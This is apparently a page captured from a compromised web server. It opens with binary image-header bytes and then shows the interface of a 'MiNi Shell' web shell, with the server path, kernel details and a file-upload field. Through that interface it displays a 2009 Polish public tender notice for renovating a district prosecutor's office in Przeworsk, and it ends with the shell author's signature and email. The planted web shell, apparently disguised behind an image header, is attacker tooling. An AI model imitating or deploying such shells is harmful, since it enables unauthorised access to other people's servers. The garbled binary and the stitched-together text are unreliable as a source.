JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090317/65760-N-2009.html

<p class="kh_header"><b>Przemyśl: Remont i przebudowa wnętrz stałych siedziby Prokuratury Rejonowej w Przeworsku, zlokalizowanej przy ul.  Studziańskiej  w  Przeworsku- II ETAP</b><br>
<b>Numer ogłoszenia: 65760 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa , ul. Waygarta 8, 37-700 Przemyśl, woj. podkarpackie, tel. 0-16 678-97-77, faks 0-16 678-85-21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.prokuratura.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i przebudowa wnętrz stałych siedziby Prokuratury Rejonowej w Przeworsku, zlokalizowanej przy ul.  Studziańskiej  w  Przeworsku- II ETAP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem   zamówienia   jest   remont   i   przebudowa  wnętrz  stałych  siedziby  Prokuratury  
     Rejonowej  w  Przeworsku,  zlokalizowanej  przy  ul.  Studziańskiej  w  Przeworsku -DRUGI   ETAP
Zgodnie ze Wspólnym  Słownikiem Zamówień (CPV) przedmiot zamówienia obejmuje zakres  określony kodem:
Główny przedmiot :
45.00.00.00 - 7    -   Roboty budowlane
Zakres robót obejmuje :
A.  Roboty budowlane:
- Scianka aluminiowa  z szybą P-2 i drzwiami  zamykanymi  na czip
B. Instalacje elektryczne   CPV 45310000 - 3
- oświetlenie  terenu
C.System  telewizji dozorowanej  CCTV - 32235000 -9
D.System alarmowy  SWIN -31620000 -8
- system przeciwpożarowy 
- alarmy antywłamaniowe
2. Szczegółowy   zakres prac będących przedmiotem zamówienia określa:
-  Wyciąg z Projektu   - w zakresie dotyczącym  drugiego etapu. 
-    Specyfikacja  Techniczna    Wykonania   i   Odbioru Robót  -w zakresie dotyczącym drugiego etapu.  
-   Przedmiar robót  - II etap.
Jeżeli    w   opisie   zamówienia ,  dokumentacji   projektowej    znajdują   się   wskazania    znaków  towarowych,    patentów     lub     pochodzenia,   Wykonawca     może    zaoferować     przedmioty równoważne      (  nie  gorsze  niż  zaproponowane  przez  Zamawiającego  ).                                 Wykazanie   równoważności    zaoferowanego   przedmiotu spoczywa  na   Wykonawcy. 
3.  Obowiązkiem    Wykonawcy     jest     przeprowadzenie     wizji  lokalnej     na    terenie    budynku               
     w    celu    uzyskania,  na   swoją    odpowiedzialność   i    na  swoje   ryzyko,  wszelkich   istotnych   
      informacji,  które    mogą   być    konieczne   do   prawidłowego    przygotowania    oferty.  Dzień                  
     i  godzinę   przeprowadzenia    wizji   lokalnej   należy   uzgodnić   telefonicznie   z   Prokuratorem 
    Rejonowym  w  Przeworsku  - nr. tel. 016 648 77  14.
4.  Wszystkie informacje przedstawione w SIWZ są   przeznaczone   wyłącznie   do   przygotowania   
      oferty   i nie  mogą  być  wykorzystywane  w   innym  celu  oraz udostępniane  osobom  nie 
      uczestniczącym   w postępowaniu.
      Wykonawca dostarcza materiały i urządzenia potrzebne do wykonania zadania.

5.   Wymagania dotyczące wykonania robót:
     -  na  wszystkie  zamontowane  materiały  wykonawca    zobowiązany  jest  przedstawić   aprobaty                
         techniczne   lub   oceny   zgodności   technicznej  -  zgodnie   z  ustawą z dnia 16 kwietnia  2004r.                 
         o  wyrobach budowlanych (Dz. U. Nr 92, poz.881):
      -  po zakończeniu robót  wykonawca   zobowiązany  jest do  uporządkowania   terenu, na   którym             
         prowadził  roboty. 
6.  Wykonawca   zobowiązany   jest   udzielić   gwarancji   na  cały przedmiot zamówienia na okres nie    
       krótszy niż  36 miesięcy   liczony od  protokolarnego  odbioru   robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 32.23.50.00-9, 31.62.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać  się  Wykonawcy, którzy : 
a. posiadają   uprawnienie   do   wykonywania  działalności   lub  czynności  objętych  przedmiotem 
    zamówienia,  jeżeli   ustawy   nakładają   obowiązek   posiadania   takich  uprawnień.  
b. posiadają    niezbędną    wiedzę  i   doświadczenie   oraz   dysponują     potencjałem    technicznym                       
     i  osobami zdolnymi do wykonania zamówienia  lub przedstawią   pisemne   zobowiązanie   innych 
    podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c. znajdują   się   w   sytuacji   ekonomicznej  i   finansowej   zapewniającej   wykonanie   zadania. 
d. nie   podlegają    wykluczeniu   z  postępowania    o  udzielenie  zamówienia  na  podstawie  art.24          
    ust. 1  oraz   ust. 2  pkt  1  ustawy   Prawo zamówień publicznych. 
2. Potwierdzeniem spełnienia warunków udziału w postępowaniu będą dokumenty wymienione        
    w rozdziale VI   SIWZ.   Ocena   spełnienia   warunków  wymaganych   od  Wykonawcy zostanie 
    dokonana  wg   formuły:   spełnia  -  nie  spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca   winien   złożyć   oświadczenie,  którego   wzór stanowi   załącznik  nr  2 do  SIWZ,          
     że   spełnia   warunki    określone   w   art. 22  ust  1  ustawy   Prawo    zamówień    publicznych               
     i   nie   podlega   wykluczeniu   z   postępowania   na   podstawie   art.  24   ust.  1  i  2   ustawy. 
 2. Wykonawca   winien   złożyć   oświadczenie , którego wzór  stanowi   załącznik   nr  3  z  treści    
      którego wynika,  że   Wykonawca   potwierdza   wykonanie   całego   zakresu   robót,  zapoznał   
      się z  ogólnymi   warunkami   umowy   oraz   zobowiązuje  się   w   przypadku    wyboru   oferty      
      do   zawarcia  umowy   na   proponowanych   warunkach. 
3.  Aktualny    dokument      potwierdzający ,   że    profil    działalności    Wykonawcy     odpowiada 
     przedmiotowi     zamówienia    oraz,  że   Wykonawca    jest    upoważniony   do   występowania         
     w  obrocie   prawnym,  zgodnie   z  wymaganiami   ustawowymi.  Aktualny odpis   z  właściwego      
     rejestru  lub  aktualne  zaświadczenie o wpisie  do   ewidencji   działalności   gospodarczej   jeśli      
     odrębne   przepisy   wymagają   wpisu  do  rejestru   lub   zgłoszenia   do  ewidencji   działalności 
     gospodarczej,  wystawione  nie  wcześniej   niż 6 m-cy  przed  upływem  terminu  złożenia  ofert            
     / załącznik nr 4./ 
4. Wykaz   zrealizowanych   w   okresie   ostatnich  pięciu  lat  przed dniem wszczęcia postępowania   
     o udzielenie zamówienia  , a jeżeli okres prowadzenia działalności jest krótszy -  w tym   okresie,       
     z  należytą starannością i w terminie umownym (co zostało potwierdzone przez  Zamawiających    
     na   rzecz    których   były   wykonane -  robót      odpowiadających  swoim   rodzajem i  wartością      
     robotom  stanowiącym   przedmiot   zamówienia    -   wzór  / załącznik nr 5/. 
5. Aktualnej    informacji    z    Krajowego   Rejestru   Karnego   albo  równoważnego   zaświadczenia 
    organu  sądowego   lub  administracyjnego   kraju   pochodzenia   osoby  w  zakresie  określonym         
    w art. 24 ust. 1 pkt. 4-8 ustawy,  wystawionych   nie   wcześniej  niż  6 miesięcy  przed   upływem       
    terminu   składania   ofert  / załącznik nr 6 /. 
6. Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24  ust. 1 pkt 9 
    ustawy   Prawo   zamówień   publicznych   wystawionej   nie   wcześniej   niż  6  miesięcy   przed        
    upływem   terminu   składania   ofert   /załącznik nr 7/. 

7. Zaświadczenie   z    Urzędu    Skarbowego    lub    oświadczenie    Wykonawcy    potwierdzające  
    odpowiednio,  że Wykonawca nie zalega z opłaceniem  podatków lub  zaświadczenie  z  Urzędu  
    Skarbowego,  że   uzyskał   przewidzianą  prawem  zgodę  na zwolnienie, odroczenie, rozłożenie     
    na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji organu  podatkowego  
    (art. 24 ust.1.pkt.3  u Pzp) - wystawione nie  wcześniej niż  3 miesiące przed  upływem  terminu   
    składania  ofert.  / załącznik  nr  8 /. 
8.  Zaświadczenie z właściwego Zakładu Ubezpieczeń Społecznych o  nie  zaleganiu  z  płatnościami          
     składek    na    ubezpieczenia    społeczne   lub   zdrowotne   -  z   wyjątkiem    przypadku     kiedy 
     Wykonawca  uzyskał   przewidzianą   prawem   zgodę    na  zwolnienie,  odroczenie,  rozłożenie      
     na  raty  zaległych  płatności   lub wstrzymanie w  całości wykonania decyzji właściwego organu             
     / art. 24 ust.1.pkt.3 u Pzp / wystawione nie wcześniej niż  3 miesiące  przed  upływem  terminu 
     składania ofert . /załącznik nr 9/. 
  9.Informacja   banku,  w   którym   prowadzony   jest    rachunek    Wykonawcy,  potwierdzająca 
       wysokość    posiadanych    środków    finansowych    lub    zdolność   kredytową    Wykonawcy, 
       wystawiona   nie   wcześniej     niż   3   miesiące   przed   upływem   terminu   składania   ofert. 
        Zamawiający  uzna,  że  Wykonawca  znajduje   się   w sytuacji   ekonomicznej   i   finansowej 
        zapewniającej     wykonanie    zamówienia ,   jeżeli    zdolność   kredytowa     lub     wysokość 
        posiadanych    środków     pieniężnych    Wykonawcy   nie   będzie  niższa    niż  40.000,00 zł.                           
        / załącznik nr 10/.
10. Informacja    dotycząca    części    zamówienia,   której   wykonanie   Wykonawca   powierzy          
       podwykonawcom  - wzór/ załącznik nr 11/. 
11.  Wymagane  powyżej  dokumenty,  są  składane  w  formie oryginału  lub kopii poświadczonej 
        za  zgodność  z oryginałem  przez  Wykonawcę. Zamawiający może zażądać  przedstawienia     
        dokumentów w formie oryginałów lub notarialnie potwierdzonych kopii  dokumentów, gdy  
        złożona przez Wykonawcę  kopia  dokumentu jest nieczytelna lub budzi   wątpliwości co do                
        jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.prokuratura.przemysl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Przemyślu ul.Waygarta 8, 37 - 700 Przemyśl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2009 godzina 09:30, miejsce: Prokuratura   Okręgowa   w   Przemyślu,  37-700 Przemyśl               
     ul. Waygarta 8  w pokoju nr 007 na parterze..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com